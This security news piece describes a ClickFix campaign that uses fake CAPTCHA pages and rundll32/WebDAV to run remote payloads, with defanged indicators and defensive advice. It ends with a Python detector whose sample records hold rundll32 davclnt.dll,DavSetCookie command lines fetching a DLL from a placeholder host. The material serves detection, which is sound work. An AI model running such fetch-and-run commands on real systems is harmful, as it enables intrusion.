A new and more dangerous version of the ClickFix attack method is now actively going after Windows users. This new version does things differently than older ones that used PowerShell or mshta to run harmful commands.

It uses two built-in Windows components, rundll32.exe and WebDAV, to quietly deliver and run harmful payloads without setting off most security alerts. This change makes the attack harder to find, especially for companies whose defenses are mostly focused on finding script-based threats. ClickFix attacks are known for getting people to run bad commands on their own computers. In this case, the attacker makes a fake website that looks like a CAPTCHA verification page.

The site tells the visitor to press Win + R to open the Windows Run dialog, then paste a command they already copied using Ctrl + V, and finally press Enter to run it. The malware uses anti-debugging checks, such as inspecting its own process ID and timing GetTickCount calls to spot a debugger slowing execution. It also injects code into the memory of legitimate running processes.

Security teams should keep a close eye on all runs of rundll32.exe that have the davclnt.dll and DavSetCookie arguments. This is a strong sign that a WebDAV-based payload is being sent. Block connections to IP addresses that are known to be malicious, such as 178.16.53[.]137, 141.98.234[.]27, 46.149.73[.]60, and 91.219.23[.]245, as well as domains that look suspicious, like mer-forgea.sightup[.]in[.]net. Organizations should also improve user awareness training that focuses on fake CAPTCHA pages and ClickFix-style social engineering attacks.
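The detection guidance above, worked through as an added example that is not part of the original article: a small Python routine that scans constructed, Sysmon-style process-creation records for rundll32.exe launches carrying davclnt.dll,DavSetCookie and pulls out the WebDAV host and URL for triage. The record layout, the sample values and the explorer.exe severity heuristic are assumptions of this example, not details from the article.

```python
import re

# Constructed sample records, not taken from the original article. Each mimics a
# flattened Sysmon Event ID 1 (process creation): ParentImage|Image|CommandLine
SAMPLE_EVENTS = [
    r"C:\Windows\explorer.exe|C:\Windows\System32\rundll32.exe|"
    r"rundll32.exe C:\Windows\System32\davclnt.dll,DavSetCookie 203.0.113.10 http://203.0.113.10/share/x.dll",
    r"C:\Windows\explorer.exe|C:\Windows\System32\rundll32.exe|"
    r"rundll32.exe shell32.dll,Control_RunDLL",
    r"C:\Windows\System32\svchost.exe|C:\Windows\System32\rundll32.exe|"
    r"RUNDLL32.EXE DAVCLNT.DLL,DavSetCookie fileserver.example https://fileserver.example/docs/",
    r"C:\Windows\System32\svchost.exe|C:\Windows\System32\notepad.exe|notepad.exe C:\notes.txt",
]

# Case-insensitive and path-agnostic: the DLL may be given bare or with its full path.
# Two optional trailing tokens capture the WebDAV host and URL passed to DavSetCookie.
DAVCLNT_RE = re.compile(
    r"davclnt\.dll\s*,\s*DavSetCookie\b(?:\s+(\S+))?(?:\s+(\S+))?", re.IGNORECASE
)


def parse_event(line):
    """Split a flattened record into its three fields; return None if malformed."""
    parts = line.split("|", 2)
    if len(parts) != 3:
        return None
    return {"parent": parts[0], "image": parts[1], "cmdline": parts[2]}


def detect_webdav_rundll32(events):
    """Return one finding per rundll32.exe launch that invokes davclnt.dll,DavSetCookie.

    Severity is raised to 'high' when the parent is explorer.exe, because a command
    pasted into the Win+R Run dialog is spawned by explorer.exe (a heuristic only).
    """
    findings = []
    for idx, line in enumerate(events):
        ev = parse_event(line)
        if ev is None or not ev["image"].lower().endswith("\\rundll32.exe"):
            continue
        m = DAVCLNT_RE.search(ev["cmdline"])
        if not m:
            continue
        parent_name = ev["parent"].rsplit("\\", 1)[-1].lower()
        findings.append({
            "index": idx,
            "host": m.group(1),
            "url": m.group(2),
            "parent": parent_name,
            "severity": "high" if parent_name == "explorer.exe" else "medium",
        })
    return findings
```

Feeding real Sysmon or EDR telemetry into `detect_webdav_rundll32` only requires flattening each event into the same three fields.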